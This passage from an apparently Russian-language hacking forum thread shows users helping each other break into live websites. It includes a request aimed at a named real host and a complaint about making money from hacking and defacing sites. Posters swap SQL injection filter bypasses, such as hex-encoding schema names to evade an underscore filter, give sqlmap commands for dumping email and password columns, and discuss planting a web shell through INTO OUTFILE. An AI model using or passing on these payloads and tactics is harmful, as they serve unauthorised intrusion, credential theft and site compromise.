А ещё там нету: Code: BLABLABLA /index.php?id=5 HTTP/1.1 Host: www.rapibus.sto.ca User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Весь веб не охватишь, сервис может быть написан на чём угодно, например https://habrahabr.ru/post/318916/.
ти! ти сломал мой зеродей, злодэй) а на счёт asp он что, не уязвим? типа как линукс относительно винды asp относительно php?
картиночка смешная) но я про реальное добывание профита веду речь. Дело в том, профит-то надо добывать, семью кормить. В ЮА обьяснить дяде из 90-х что ему нужно безопасность за косарь грина - трудно. Взломаешь, дефейснешь - с бэкапа востановят. 10 раз дефейснешь - 10 раз востановят. С каждым днем все переходят на фреймворки, где багов либо нет, либо их найти крайне трудно, эксплуатировать - ещё труднее. В общем я о том, что поле с хлебом сужается, камней становится больше, а серп все тот же, что в 2007, или когда там Dr.Z3r0 писал фак по мускулу
Доброго времени суток! Какие есть способы обойти фильтр на _ (нижнее подчеркивание) в sql-inj? Фильтр в имени таблицы обошел, как обойти в названии колонки? на запрос (select+table_name+FROM+(SELECT+0x696E666F726D6174696F6E5F736368656D612E7461626C6573)%20AS%20t2) отвечает: %5f и %255f не проходит
не, так тоже не получится Code: > select table_name FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C6573)t1 limit 1; Unknown column 'table_name' in 'field list'
У меня такой запрос проходит, инфу из колонок где нет "_" в имени выводит нормально. Вопрос как обойти фильтр на "_"
хм вроде не должно оно так работать попробуй ради интереса вывести инфу из таблицы COLUMNS колонку например PRIVILEGES(там должно быть 'select' 'insert' etc), если к таблицам доступ таки есть, то можно подумать
Способ очень прост ,допустим мы знаем что есть таблица "_"users ,мы можешь предположить что там есть колонки email,pass ,информацию сразу из них надо выводить на примере мепа -D bblalala -T "_"users --columns < тишина -D blalalala -T "_"users -C email,password --dump и сразу все пойдет
я про эту конструкцию спрашивал Code: select+table_name+FROM+(SELECT+0x696E666F726D6174696F6E5F736368656D612E7461626C6573)%20AS%20t2) брут таблиц и скульмап мне известны
в этом посте подсмотрел https://forum.antichat.ru/threads/46016/page-1105#post-3472979 еще раз, данные выводятся, НО только из тех колонок у которых в имени нету "_". Этим способом мне удалось обойти фильтрацию "_" в имени таблицы, но чтобы вытащить нужные данные необходимо обойти фильтрацию "_" в имени колонки!
ну ок, выводятся дак выводятся) хотя я всё равно не верю, мне кажется ты не проверял Code: > SELECT * FROM (SELECT 0x696E666F726D6174696F6E5F736368656D612E7461626C6573) AS t2; +------------------------------------------------------+ | 0x696E666F726D6174696F6E5F736368656D612E7461626C6573 | +------------------------------------------------------+ | information_schema.tables | +------------------------------------------------------+ 1 row in set (0.00 sec) не чует мускул таблицу в таком виде, from не eval, на лету данные не конвертит запрос через get идёт? post'ом пробовал отправлять?
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть), но указывать пути не могу по причине того, что не работает флеш ( INTO OUTFILE "путь/до/шелла") Что посоветуете ?
В INTO OUTFILE "путь/до/шелла" не получится хексить путь. Если слеш режется - заливка через into outfile обламывается. Путь должен быть написан так, как его понимает система. На винде можно пробовать обратный слеш - "\".